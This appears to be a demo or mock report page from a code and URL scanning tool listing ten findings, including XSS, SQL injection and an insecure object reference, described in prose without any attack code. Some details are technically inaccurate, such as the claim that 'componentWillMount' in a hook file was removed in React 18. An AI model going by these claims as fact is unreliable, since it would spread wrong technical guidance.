URL Scan10 Bugs

https://dashboard.acmecorp.io/admin

May 29, 2026 · 11:22·10 bugs detected

Critical

High

Medium

Low

Severity Distribution

Bug breakdown by severity level

10total

Critical2

High3

Medium3

Low2

Filter by Severity

Sort By

Showing 10 of 10 bugs

Bug Report10 of 10 shown

CriticalXSS Vulnerability

Line 42 — /src/components/UserInput.jsx

User-supplied input is rendered directly into the DOM without sanitization. An attacker could inject malicious scripts that run in other users' browsers, stealing session tokens or hijacking accounts.

CriticalSQL Injection Risk

Line 118 — /api/routes/users.js

A raw database query is constructed using string concatenation with unvalidated user input. This allows attackers to manipulate the query and potentially access, modify, or delete all database records.

HighNull Reference Exception

Line 77 — /src/utils/dataTransform.ts

The function accesses a property on an object that may be null or undefined at runtime. This causes the application to crash when the upstream API returns an empty or error response.

HighUnhandled Promise Rejection

Line 203 — /src/services/authService.ts

An async function call lacks a try/catch block. If the network request fails or the server returns an error, the rejection is not caught, causing silent failures and leaving the UI in a broken state.

HighInsecure Direct Object Reference

GET /api/documents/:id

The API endpoint retrieves a document by ID without verifying that the requesting user owns or has permission to access that document. Any authenticated user can access any document by guessing its ID.

MediumMissing Input Validation

Line 55 — /src/pages/api/contact.ts

The email field in the contact form is not validated on the server side. While client-side validation exists, it can be bypassed, allowing malformed email addresses to be stored in the database.

MediumDeprecated API Usage

Line 31 — /src/hooks/useAuth.ts

The code uses `componentWillMount`, a deprecated React lifecycle method that was removed in React 18. This will cause a runtime error when upgrading and may produce unexpected behavior in the current version.

MediumMemory Leak

Line 89 — /src/components/LiveFeed.tsx

A `setInterval` is started when the component mounts but is never cleared when the component unmounts. This causes the interval to keep running and accumulate in memory every time the component is re-mounted.

LowConsole Log in Production

Line 14, 28, 67 — /src/utils/logger.ts

Multiple `console.log` statements containing sensitive debug information (user IDs, session tokens) are present in production code. These can expose internal implementation details to anyone with browser DevTools open.

#10

LowUnused Variable

Line 22 — /src/pages/dashboard.tsx

A variable `prevData` is declared and assigned but never used anywhere in the component. While this doesn't cause a runtime error, it increases bundle size slightly and may confuse developers maintaining the code.

Scanned May 29, 2026 · 11:22